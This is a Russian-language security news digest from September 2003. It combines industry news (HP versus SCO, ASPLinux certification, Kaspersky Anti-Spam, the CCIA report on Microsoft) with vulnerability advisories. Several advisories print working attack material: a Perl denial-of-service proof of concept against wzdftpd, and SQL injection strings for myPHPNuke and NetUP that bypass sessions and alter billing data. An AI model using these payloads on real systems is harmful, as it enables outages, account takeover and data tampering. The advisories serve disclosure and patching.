Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/9/25 00:33 - 2003/9/25 23:33


НР конкретизирует план защиты заказчиков

25 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Компания обещает защитить новых заказчиков, купивших Linux через НР, согласившихся не вносить несанкционированные изменения в исходный код Linux и подписавших стандартный контракт на техническую поддержку. На компенсацию могут рассчитывать и прежние заказчики НР, не изменявшие свой дистрибутив Linux и подписавшие отредактированный контракт. «Мы даем заказчикам зеленый свет в их дальнейших Linux-проектах», — сказал репортерам вице-президент НР Мартин Финк.

Как уже сообщалось, НР решила обезопасить своих заказчиков на случай предъявления им судебных исков со стороны SCO Group, которая угрожает компаниям и индивидуальным пользователям судебным преследованием.

Финк сообщил, что защита НР распространяется только на возможные судебные иски, поданные SCO. НР отказывается комментировать вопрос о правоте SCO в этом деле. «Это решит суд», — сказал Финк. Тем не менее НР отмечает, что она изучила эту проблему, оценила разные варианты и решила, что риск оправдан. «Мы провели внутренний анализ и приняли осознанное решение взять на себя риск наших заказчиков», — сказал Финк. По его словам, защита не опирается ни на какое-либо новое партнерское соглашение с SCO по поводу Linux. В то же время он отказался отвечать на вопрос, есть ли у НР соглашение с SCO по Unix. Представитель SCO говорит, что у НР есть долгосрочная лицензия на Unix, охватывающая версию Unix HP-UX.

Финк заявил, что данный шаг освобождает заказчиков от необходимости выбирать между выплатой лицензионной платы SCO и риском судебного преследования. Но защита НР имеет свои границы. Одно ограничение заключается в том, что заказчики должны согласиться вносить в свои операционные системы лишь те изменения, которые выполнены поставщиком Linux, например Red Hat или SuSe. «Изменив исходный код, вы теряете компенсацию», — сказал Финк. Однако многие конкуренты НР не предприняли даже таких ограниченных шагов, отмечает компания. «Наши конкуренты отстали, — сказал Финк. — Они не хотят предстать перед судом от имени заказчиков».

Однако Sun Microsystems согласилась защитить ограниченный круг заказчиков — тех, кто применяет ее настольную систему Java на базе Linux. Защищены и те, кто работает с Solaris, но заказчики, использующие Linux на серверах Sun, делают это на свой страх и риск. Sun решает также вопрос, защищать ли заказчиков Java, которые используют Linux вместе с Java на сотовых телефонах и других портативных устройствах, — об этом сообщил CNET News.com исполнительный вице-президент Sun Джонатан Шварц.

SCO в своем заявлении одобрила шаг НР и призвала другие компании, такие как Red Hat и IBM, последовать ее примеру. «Действия НР подтверждают тот факт, что конечные пользователи Linux в организациях рискуют, — говорит SCO. — Вместо того, чтобы отрицать существование принципиальных структурных проблем Linux, что делают многие лидеры движения open-source, НР признала эти проблемы и пытается помочь своим заказчикам избавиться от них». Финк в ответ на это заявление сказал: «Это интересный поворот», — но опять же отказался комментировать существо дела SCO.

Блейни Гарпер, специалист по вопросам интеллектуальной собственности из фирмы Jones Day, расценивает шаг НР главным образом как способ ублажить заказчиков, хотя он может отражать и уверенность НР в слабости позиции SCO. «Вероятно, они изучили дело SCO и решили, что правда на их стороне», — сказал он.

По словам Гарпера, если предположить, что претензии SCO справедливы, не ясно, на кого ляжет основная ответственность — на дистрибьюторов Linux, такие компании, как НР, или на пользователей. «Это не простой вопрос, — говорит он. — Разных версий дальнейшего развития событий очень много, и разобраться в этом довольно сложно».

0

ASPLinux 7.3 Server Edition сертифицирован Гостехкомиссией

25 сентября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

Гостехкомиссия России сертифицировала дистрибутив ASPLinux 7.3 Server Edition. Согласно сертификату номер 775 от 29 августа 2003 года, дистрибутив ASPLinux 7.3 Server Edition с файловой системой XFS сертифицирован Гостехкомиссией РФ по 5 классу защищенности для СВТ и по 4 уровню контроля для НДВ.

Для выполнения требований, предъявляемых Гостехкомиссией к программным продуктам, в программные пакеты и документацию дистрибутива были внесены незначительные изменения.

Как сообщил Кирилл Конягин, технический директор ASPLinux, сертификация Гостехкомиссией России расширяет сферу применения серверного дистрибутива ASPLinux, в частности, теперь он может использоваться в системах обработки конфиденциальной информации.

Стоимость коробочной версии дистрибутива, включающей печатную документацию и техническую поддержку, составляет 150$.

1

Москва, октябрь: второй форум «Безопасность в торговле-2003»

25 сентября | Рубрика: Информационая безопасность бизнеса События, семинары, конференции, даты

30 октября в здании московской мэрии на Новом Арбате состоится Второй международный профессиональный форум «Безопасность в торговле-2003», который организует Центр безопасности торговли (ЦБТ). Планируется, что в этом форуме примут участие до 1000 представителей, включая: начальников СБ российских и западных предприятий, руководителей ЧОПов, поставщиков технических средств безопасности, - а также владельцев и директоров торговых центров.

Форум пройдет по трем группам. Вот только некоторые темы:

- Анализ угроз и потерь на торговом предприятии;

- орагнизация системы предотвращения потерь (ЧОП в магазине);

- Технические решения в системе безопасности магазина;

-Техническое обеспечение безопасности

- Систематизация безопасности;

-Частные охранные предприятия;

- Службы безопасности на торговом предприятии и т.д.

В фойе Форума будет организована выставка компаний. По данным www.OXPAHA.ru, в работе Форума примут участие с выступлениями представители таких крупных охранно-детективных структур как «Альтернатива-М» и «ШЕРИФ».

Подробную информацию можно найти по адресу: www.elementstore.ru

2

В Москве завершен первый день конференции "Проблема спама и её решения"

25 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, даты

В среду в Москве завершился первый день первой национальной конференции "Проблема спама и её решения", проводимой Национальной коалицией против спама.

Как сообщают организаторы, конференция посвящена "всем аспектам борьбы со спамом - от юридических до технических" и будет полезна для руководителей государственных органов, технических директоров компаний, системных администраторов, маркетологов, юристов.

Первый день конференции был посвящен проблеме спама как социального феномена, а также отношения общества к спаму как антиобщественному явлению. Отдельной темой рассматривалось отношение к спаму в интернет-сообществе. Участники конференции также рассмотрели угрозы, которые несет распространение спама и перспективы законодательного пути ограничения активности спамеров.

С докладами выступили представители ведущих российских компаний, работающих в сфере Интернета, связи, коммуникаций и информационной безопасности, таких как Рамблер, Mail.ru, Subscribe.ru, МТУ-Интел, Яндекс, Лаборатория Касперского.

Второй день конференции будет посвящен техническим аспектам борьбы со спамом на различных уровнях - от провайдеров, до рядовых пользователей..
3


Кибертерроризм - опасная реальность?

25 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Кибертерроризм – это преднамеренная, мотивированная атака на информацию, обрабатываемую компьютером, компьютерную систему и сети, которая создает опасность для жизни или здоровья людей или наступление других тяжких последствий, если такие действия были содеянные с целью нарушения общественной безопасности, запугивания населения, провокации военного конфликта. Кибертерроризм от киберпреступности, отличается тем, что в число его целей могут входить политическая или экономическая дестабилизация, саботаж, кража военных или гражданских активов и ресурсов в политических целях.

Как уголовно-правовой феномен, терроризм носит международный характер и в соответствии с рядом международных документов относится к числу международных преступлений. В полной мере это распространяется и на новые формы его проявления - электронный терроризм. Анализ мировых тенденций развития киберпреступности с большой долей вероятности позволяет прогнозировать, что его угроза с каждым годом возрастает.

По мнению большинства экспертов в этой области, кибертерроризм - превращается в серьезную угрозу для человечества, сравнимую с ядерным, бактериологическим и химическим оружием, причем степень этой угрозы в силу своей новизны, не до конца еще осознана и изучена. Опыт, который уже имеется у мирового сообщества в этой области со всей очевидностью свидетельствует о несомненной уязвимости любого государства, тем более, что такой терроризм не имеет государственных границ. Кибертеррорист способен в равной степени угрожать информационным системам, расположенным практически в любой точке земного шара.

Особую озабоченность среди специалистов вызывает уязвимость компьютерных систем управления критической инфрастуктурой (транспорт, атомные электростанции, водоснабжение и энергетика), подключенных к Интернету. Интернет охватывает более 150 стран мира, и число пользователей постоянно увеличивается: в США их уже 160 млн., в Европе – 95 млн., в России – около 8 млн., в Украине – 0,6 млн.

Сегодня угроза электронного терроризма из области мифологии уверенно входит в нашу реальность. Технический прогресс, развивается настолько стремительно, что некоторые его последствия осознаются обществом слишком поздно, когда для исправления ситуации требуются уже значительные усилия. Существует даже мнение, что при переходе некоторой критической точки прогресс начинает работать уже на уничтожение человечества. Такая ситуация сложилась, например, с экологией и, к сожалению, складывается в области информационных технологий.
4


Портал SEC.RU начинает проведение бесплатных семинаров-практикумов

25 сентября | Рубрика: События, семинары, конференции, даты

Портал SEC.RU начинает проведение бесплатных семинаров-практикумов.

Портал SEC.RU начинает проведение бесплатных семинаров-практикумов. Основные темы, которые будут затронуты на семинарах:

  1. Гипермаркет технических средств безопасности Shop.Sec.ru: цели создания, принципы, преимущества участия в качестве поставщика.
  2. Сервисы, существующие в рамках Гипермаркета. Использование сервисов для реализации торговой политики поставщика (практический аспект).
  3. Методы продвижения продукции с помощью Интернет (новые технологии, практический опыт). Продвижение продукции с помощью тематических сайтов. Нестандартные и эксклюзивные варианты рекламы.

Семинары-практикумы организуются с целью предоставить участникам рынка безопасности максимально полную информацию о возможностях и преспективах продвижения продукции с помощью Интернет.

К участию приглашаются представители компаний отрасли Security, которые заинтересованы в использовании современных компьютерных технологий для развития бизнеса.

Первый семинар состоится 30 сентября 2003 года. Более подробную информацию можно получить у Рогачевой Светланы, e-mail: sveta@sec.ru

5

ESMART Access — еще одна двухфакторная защита

25 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Российская софтверная компания ISBC разработала программно-аппаратный комплекс защиты компьютера от несанкционированного доступа ESMART Access, реализующий схему двухфакторной аутентификации.

Новинка позволяет построить более совершенную систему управления доступом к информационным ресурсам, повысить информационную безопасность и снизить нагрузку на ИТ-персонал, связанную с настройкой и восстановлением паролей.

Комплекс поддерживает работу с наиболее распространенными токенами (в частности, USB Token, USB Drive, бесконтактными смарт-картами) и широким перечнем считывателей смарт-карт.

Система обеспечивает защищенный доступ в Windows с помощью смарт-карты, автоматический ввод имени и пароля пользователя к приложениям, хранение персональной информации в электронном блокноте, генерацию стойких к взлому паролей и интуитивно понятный пользовательский интерфейс.

Коробочная версия ESMART Access включает ридер смарт-карт, две карты доступа, программное обеспечение и документацию.

Продукт адресован небольшим компаниям и домашним пользователям. Для крупных организаций готовится сетевая версия комплекса.

6

Обход обнаружения Javascript кода в внутри "A HREF" тэга в AppScan Audit Edition

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Sanctum AppScan 4.0 Audit Edition

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в AppScan Audit Edition. Удаленный пользователь может сконструировать HTML, содержащий злонамеренную ссылку, которая не будет обнаружена и протестирована приложением.

Недостаток обнаружен в AppScan "Explore stage", когда он конфигурирован для "Automatic Scan". Когда HTML код используется внутри "A HREF" тэга, приложение не сможет обнаружить и протестировать URL.

Пример/Эксплоит:

<script>
function openBrWindow(theURL,winName,features)
{ window.open(theURL,winName,features); }
</script>

<a href="#" onClick="openWindow('bla.html','','');">
<img src="bla.jpg"></a>

URL производителя: http://www.sanctuminc.com/solutions/appscanaud/index.html

Решение:Используйте "Interactive" тип сканирования.

7

Отказ в обслуживании против wzdftpd FTP сервера

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: wzdftpd 0.1rc5

Опасность: Низкая

Наличие эксплоита: Да

Описание: Отказ в обслуживании обнаружен в wzdftpd FTP сервере. Удаленный атакующий может аварийно завершить работу FTP сервера.

Удаленный пользователь может послать одиночную последовательность CR LF в login prompt, чтобы вызвать исключение и аварийно завершить работу FTP сервера.

Пример/Эксплоит:

#!/usr/bin/perl
 
#   ####################################
#   #     Proof of concept for         #
#   # WZDFTPD FTP Server version 0.1rc5 #
#   ####################################
 
# http://www.moozatech.com/mt-23-09-2003.txt
 
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";

if (defined $host && defined $port ) {
} else {
  print "Oops, Something is missing.\n";
  die "Usage: perl mooza1.pl [host] [port]\n";
 

print "Connecting to $host:$port... ";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
 Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);

sleep 2;
print "we are done here..\n\n";
close($socket);

URL производителя: http://www.wzdftpd.net/

Решение: Установите обновленную версию программы с сайта производителя.

8

Sql инъекция в myPHPNuke

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: myPHPNuke 1.x

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в myPHPNuke. Злонамеренный пользователь может выполнить нападение SQL инъекции.

myPHPNuke не фильтрует пользовательские данные в "aid" параметре в auth.inc.php файле. В результате удаленный пользователь может внедрить произвольный SQL код. Уязвимость работает только при отключенной PHP опции magic_quotes_gpc.

Пример/Эксплоит:

aid=mad' into outfile '/filepath/file.txt

URL производителя:http://www.myphpnuke.com

Решение: Вполните следующие изменения:

Find the line
**********
if ((isset($aid)) && (isset($pwd)) && ($op == "login")) {
if($aid!="" AND $pwd!="") {
**********

Add

**********
$aid=addslashes($aid);
**********

9

Удаленное выполнение произвольного кода в wodFTPServer ActiveX компоненте

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: wodFTPServer ActiveX Component 1.x

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в wodFTPServer ActiveX компоненте. Злонамеренный пользователь может выполнить произвольный код на уязвимой системе.

Переполнение буфера обнаружено при обработке различных FTP команд. Удаленный пользователь может представить чрезмерно длинный (более 260 байт) специально обработанный параметр к FTP команде, чтобы вызвать переполнение буфера.

URL производителя:http://www.weonlydo.com/index.asp?showform=FTPServer

Решение: Обновите программу до версии 1.1.0.5: http://www.weonlydo.com/index.asp?showform=FTPServer

10

Удаленное выполнение произвольного кода в mpg123

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: mpg123 0.x

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в mpg123. Злонамеренный пользователь может скомпрометировать удаленную систему.

Переполнение буфера обнаружено в функции readstring() в 'httpget.c' файле и может эксплуатироваться при чтении строки с удаленного потокового сервера через HTTP протокол. Значение полученной переменной записывается в фиксированный 1024 байтовый буфер, без предварительной проверки фактически полученных данных.

Пример/Эксплоит: http://www.securitylab.ru/_exploits/mpg123.c.txt

URL производителя: href=http://www.mpg123.de/

Решение: Не подключайтесь к потоковому серверу через HTTP протокол.

11

"Лаборатория Касперского" модернизирует антиспамовое оружие

25 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность общественной коммуникации, личности.

"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает о выпуске и начале продаж новой версии популярного программного комплекса для защиты от нежелательных электронных рассылок - Kaspersky® Anti-Spam 1.5.

Kaspersky® Anti-Spam - это мощное средство противодействия спаму на основе многоуровневой системы фильтрации электронной почты. Не имеющая аналогов технология лингвистического анализа электронных писем позволяет системе самостоятельно проанализировать текст письма, понять его смысл и отсеять нежелательную корреспонденцию. Помимо этого, Kaspersky® Anti-Spam является единственной системой полномасштабной защиты от русскоязычного спама, что делает продукт уникальным для российских условий.

Пользователи Kaspersky® Anti-Spam обеспечиваются ежедневными обновлениями базы лексических сигнатур, используемых при детектировании спама, разработку которых осуществляют профессиональные лингвисты. Таким образом, почтовый ящик недоступен даже для самых последних образцов нежелательных электронных писем. Интегрированный модуль управления, представленный веб-интерфейсом, дает системному администратору возможность оперативно измененять параметры работы программы из любой точки сети.

Новая версия Kaspersky® Anti-Spam содержит широкий ряд технологических изменений и доработок, значительно повысивших эффективность работы программного комплекса. Продукт включает в себя инновационные технологии, позволяющие успешно распознавать такие приемы спамеров, как подставка случайной последовательности символов в заголовке и теле сообщения и включенные в тело письма графические элементы.

Помимо этого, в усовершенствованной версии значительно улучшена работа с корреспонденцией, представленной в различных вариантах кодировки, существенно повышена стабильность модуля фильтрации и отказоустойчивость продукта в целом. Благодаря внедрению новых технологических наработок 'Лаборатории Касперского', скорость фильтрации почтового трафика по сравнению с предшествующей версией увеличилась в 4 раза. Серьезно улучшена совместимость продукта - теперь список поддерживаемых программой почтовых серверов дополнен системой postfix 2.х.

12

"Лаборатория Касперского" - на выставке достижений IT-хозяйства России

25 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, даты

"Лаборатория Касперского", российский лидер в области разработки систем защиты от вирусов, хакерских атак и спама, приглашает посетить стенд компании на одной из крупнейших национальных выставок достижений в области информационных технологий "Softool-2003" (стенд D1). Выставка пройдет с 30 сентября по 4 октября в павильоне 69 Всероссийского Выставочного Центра (ВВЦ).

Следуя устоявшейся за время участия в проведении выставки "Softool" традиции, экспозиция "Лаборатории Касперского" разместится напротив главного входа в павильоне по адресу D1. Компания предложит вниманию посетителей полный спектр продуктов в области компьютерной безопасности, включая новые версии популярных антивирусных продуктов, предназначенных для обеспечения полномасштабной защиты персональных компьютеров - Антивирус Касперского® Personal 4.5 и Антивирус Касперского® Personal Pro 4.5. Помимо этого посетители смогут ознакомиться с новой версией программного комплекса для защиты от нежелательных электронных рассылок - Kaspersky® Anti-Spam 1.5.

В рамках интересных и красочных презентаций ведущие специалисты "Лаборатории Касперского" познакомят посетителей с последними тенденциями в области компьютерной вирусологии, подробно расскажут о новых программных продуктах и технологических достижениях компании. Кроме информационной программы, посетителей выставочного стенда "Лаборатории Касперского" ожидают викторины и лотереи с ценными призами.

13

CCIA: Microsoft угрожает госбезопасности США

25 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность государственной власти

Монополия компании Microsoft в сфере производства программного обеспечения для компьютеров снижает степень защищенности компьютерных систем и способствует распространению вирусных эпидемий. Исследование об этом было распространено на собрании Ассоциации компьютерной и телекоммуникационной отрасли (CCIA) в Вашингтоне (округ Колумбия), спонсорами которого выступили конкуренты редмондского гиганта, сообщает агентство France Presse. В самой Microsoft пока еще не никак не отреагировали на обнародованное исследование.

"Монополия Microsoft угрожает обыкновенным пользователям с различных сторон, однако теперь она создала угрозу и государственной безопасности", - утверждает Эд Блэк, президент CCIA.

Все выступавшие на конференции делали упор на то, что Microsoft, желая сделать свою продукцию более доступной пользователю, совершенно не обращает внимания на ее безопасность. В частности, обилие встроенных прикладных программ в операционной системе Windows, которая установлена на девяти ПК из десяти в мире, влечет за собой обилие уязвимостей и дыр, отмечает Дэниел Гир, один из соавторов исследования. При этом некоторые эксперты заявили, что такое качество продуктов в любой другой отрасли было бы недопустимым.

В качестве наглядного примера специалисты приводили недавние эпидемии вирусов Blaster и SoBig, парализовавшие информационные сети американской администрации и многих предприятий.

В прошлом месяце CCIA обратилась в департамент внутренней безопасности США (аналог МВД) с просьбой пересмотреть решение о выборе Microsoft в качестве главного поставщика компьютеров государственным органам. "Подобный выбор, - утверждалось в обращении, - не способствует обеспечению государственной безопасности и стабильности, необходимой для защиты одной из самых важных информационных сетей страны".

Ранее монопольный статус американского гиганта осудила Европейская комиссия, которая рекомендовала компании перестроить свою коммерческую деятельность на внешних рынках.

14

Удаленное переполнение буфера в Knox Arkeia Pro (обновлено)

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Knox Arkei Pro 5.1.12

Опасность: Критическая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Knox Arkeia Pro. Удаленный пользователь может получить root привилегии на системе.

Удаленный пользователь может послать специально сформированные данные к Knox Arkei, чтобы выполнить произвольный код на системе с root привилегиями.

Пример/Эксплоит: http://www.securitylab.ru/_exploits/knol.c.txt

URL производителя: http://www.arkeia.com/index.html

Решение: Ограничте доступ к серверу только из доверенных IP адресов. Уязвимость устранена в Arkeia 5.1.15, которую можно загрузить отсюда: http://www.arkeia.com/download.html

15

Возможность изменения защищенных документов в Microsoft PowerPoint 2002

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Microsoft PowerPoint 2002, Microsoft Office XP

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в PowerPoint 2002. Злонамеренный пользователь может модифицировать защищенные документы.

Одна из возможностей PowerPoint позволяет пользователям защищать PowerPoint документы от редактирования.

Однако, содержание защищенной презентации может быть украдено, создавая новую презентацию и открывая в защищенной презентации "Tools->Macro->Microsoft Script Editor". Когда Script Editor открыт, все файлы защищенного документа будут доступны во временном каталоге.

Низкая опасность этой уязвимости связанна с тем, что существуют и другие способы редактирования защищенного документа.

URL производителя:http://www.microsoft.com

Решение: Используйте криптографические методы защиты документов.

16

Множественные уязвимости в NetUP

25 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: NetUP

Опасность: Критическая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в NetUP. Злонамеренный пользователь может получить доступ к системе и манипулировать учетной записью пользователя.

1. Сценарии "admin" and "utm_stat” не проверяют "sid" параметр. В результате злонамеренный пользователь может внедриться в сессию другого пользователя через SQL инъекцию:

https://[server]/cgi-bin/utm/admin?cmd=full_view&sid=q%22%20OR%201=1%20OR%20%22q%22=%22q
https://[server]/cgi-bin/utm/utm_stat?cmd=user_report&sid=q%22%20OR%201=1%20OR%20%22q%22=%22q
2. Удаленный пользователь может изменять данные других пользователей, используя уязвимость SQL инъекции в '/cgi-bin/utm/user_stat' script сценарии:
https://[server]/cgi-bin/utm/utm_stat?cmd=change_lang&lang=ru%22,%20bill=10000,%20lang=%22ru&sid=sessionid
Также сообщается, что множество других сценариев уязвимы к SQL инъекции.

URL производителя: http://www.netup.biz/

Решение: Ограничьте доступ к приложению только доверенным пользователям. Используйте альтернативное программное обеспечение.

17




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное